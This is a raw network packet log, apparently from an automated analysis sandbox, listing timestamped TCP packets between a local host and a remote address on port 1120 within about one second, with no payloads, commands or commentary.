Sep 24, 2024 17:46:11.181560993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.181570053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181606054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.181768894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181791067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181802034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181813002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181823015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.181842089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.184516907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184593916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184604883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184653044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.184799910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184811115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184820890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184832096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184842110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.184847116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.184875011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.185194969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185206890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185218096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185229063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185239077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185250044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.185256958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.185285091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.190256119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190329075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190340042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190388918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.190542936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190583944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.190623999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190637112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190648079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190659046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.190668106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.190689087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.191266060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191277027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191288948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191299915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191314936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191325903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191327095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.191358089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.191979885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.191992044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192002058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192012072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192023039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192034006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192040920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.192044020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.192065954 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.232527018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.251662970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251678944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251698017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251728058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.251794100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251806021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251816988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.251828909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.251847982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.252110004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.252123117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.252166033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.262227058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.262239933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.262250900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.262300014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263067007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263104916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263246059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263401985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263442039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263528109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263649940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263662100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263672113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263681889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263684034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263694048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263703108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263706923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263722897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263776064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263928890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263938904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263948917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263973951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263982058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.263983011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.263993979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264005899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264013052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264017105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264036894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264061928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264626980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264755011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264765978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264775991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264786005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264790058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264797926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264803886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264810085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264820099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.264837027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.264852047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.265525103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.265558958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.265593052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.268481970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.268642902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.268662930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.268690109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270224094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270231962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270234108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270236969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270251036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270262003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270273924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270282030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270283937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270296097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270306110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270313025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270318031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270328045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270328045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270358086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270370007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270380974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270390034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270400047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270401001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270411968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270418882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270431042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270442009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.270445108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.270479918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.271856070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.271982908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272001982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272022009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.272332907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272344112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272355080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272366047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.272368908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.272388935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.273602009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273613930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273628950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273642063 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.273658991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.273782969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273804903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273837090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.273962021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.273988008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.274015903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.277635098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.277790070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.277812004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.277932882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.277954102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.277991056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.278117895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.278281927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.278321028 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.278453112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.278476954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.278513908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.280596972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280616999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280630112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280658007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.280741930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280761003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280782938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.280925989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280942917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.280963898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.281429052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281445980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281456947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281466007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281471968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.281488895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.281708956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281749010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.281841993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281853914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281862974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.281888008 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.286501884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.286513090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.286529064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.286555052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.286576986 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.286803007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.286822081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.286855936 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.286983013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287003994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287034035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.287345886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287363052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287374020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287389040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287398100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.287399054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287410975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287417889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.287421942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.287446022 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.288069010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288084030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288094997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288105011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288111925 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.288127899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.288217068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288228989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288242102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.288255930 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.288274050 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.355777979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.355899096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.355916977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.356020927 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.356226921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.356239080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.356256008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.356265068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.356283903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.356307030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.380074978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380095005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380106926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380213022 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.380420923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380431890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380444050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380455017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.380530119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.380530119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.381392956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381403923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381421089 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381434917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381459951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381473064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.381480932 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.381521940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.382865906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.382879019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.382889986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.382900000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.382929087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.382941961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.383042097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.383053064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.383071899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.383090973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.384759903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384772062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384783983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384794950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384807110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384815931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.384816885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384828091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.384830952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.384851933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.384874105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.385268927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385288954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385298967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385304928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385338068 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.385421991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385425091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.385462999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.386562109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386756897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386769056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386779070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386809111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.386828899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.386924982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386939049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386949062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.386981010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.387413979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387459993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.387557030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387569904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387582064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387593031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387604952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.387608051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387619019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.387634993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.387659073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.388468981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388482094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388498068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388508081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388518095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388530970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388535976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388541937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.388566017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.388787985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388803005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388816118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388832092 CEST	1120	49730	64.95.13.143	192.168.2.4
